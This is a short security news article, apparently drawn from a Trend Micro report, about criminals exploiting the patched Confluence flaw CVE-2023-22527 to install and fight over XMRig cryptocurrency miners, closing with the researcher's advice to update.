Atlassian Confluence Data Center and Confluence Server previously had a maximum severity vulnerability that allowed threat actors to remotely execute any malicious code.
Even though the solution has been available for months, there are many unprotected endpoints.
As a result, hackers have been observed installing cryptocurrency miners on these devices, leading to huge electricity bills for victims and rendering their devices virtually unusable.
Fight for control
This is according to a new report from cybersecurity researchers at Trend Micro, published earlier this week. The report claims that criminals are competing with each other, removing and installing cryptominers on a regular basis.
The vulnerability is known as CVE-2023-22527. It is a 10/10 severity critical flaw that allows remote code execution and was patched in mid-January of this year. However, since mid-June of this year, criminals have started looking for vulnerable instances and taking down the XMRig miner where possible. XMRig is the most popular cryptocurrency miner out there and generates the Monero (XMR) cryptocurrency. Monero is described as a privacy coin as it is virtually untraceable.
“The attacks involve threat actors employing methods such as deploying shell scripts and XMRig miners, targeting SSH endpoints, killing competing cryptocurrency mining processes, and maintaining persistence via cron jobs,” said Trend Micro researcher Abdelrahman Esmail.
The part about “killing competing cryptocurrency mining processes” is particularly interesting. The researcher said there are at least three different actors fighting to maintain control over these endpoints. Once they compromise the device, they will use a shell script to terminate previous miners, delete all existing cron jobs, uninstall cloud security tools, and gather system information. After that, they will establish a channel with the C2 server and launch a new miner.
“With its continued exploitation by threat actors, CVE-2023-22527 poses a significant security risk to organizations worldwide,” the researcher added. “To minimize the risks and threats associated with this vulnerability, administrators should update their Confluence Data Center and Confluence Server versions to the latest available versions as soon as possible.”
Through Hacker News
